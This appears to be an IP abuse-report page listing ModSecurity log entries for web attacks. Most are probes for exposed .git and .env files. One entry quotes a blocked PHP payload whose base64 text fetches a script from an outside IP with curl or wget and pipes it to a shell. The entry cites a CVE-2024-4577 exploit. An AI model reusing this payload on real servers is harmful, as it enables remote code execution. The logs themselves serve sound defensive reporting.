🇳🇱 45.144.212.126	14 May 2025	14/May/2025:15:29:19.931709 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:15:29:19.931709 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.144.212.126] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.1.53"] [uri "/.git/config"] [unique_id "aCSar_ZTp-adXxSGwbTnuQAABso"] 14/May/2025:15:29:26.393270 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 45.144.212.126] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-93 ... show less	Hacking Web App Attack
🇨🇭 179.43.152.115	14 May 2025	14/May/2025:15:16:12.240385 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:15:16:12.240385 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.152.115] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "51.159.22.164"] [uri "/www/.git/config"] [unique_id "aCSXnOz5GwpXvHeCop1yEAAABUg"] 14/May/2025:15:16:12.278093 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 179.43.152.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RE ... show less	Hacking Web App Attack
🇳🇱 93.123.109.228	14 May 2025	14/May/2025:15:08:02.319772 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:15:08:02.319772 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/.env.test"] [unique_id "aCSVsoipIHoI0q3Lm2beLQAABgQ"] 14/May/2025:15:08:02.458565 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APP ... show less	Hacking Web App Attack
🇮🇳 216.10.250.218	14 May 2025	14/May/2025:14:54:02.096707 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:14:54:02.096707 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 216.10.250.218] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [ ... show less	Hacking Web App Attack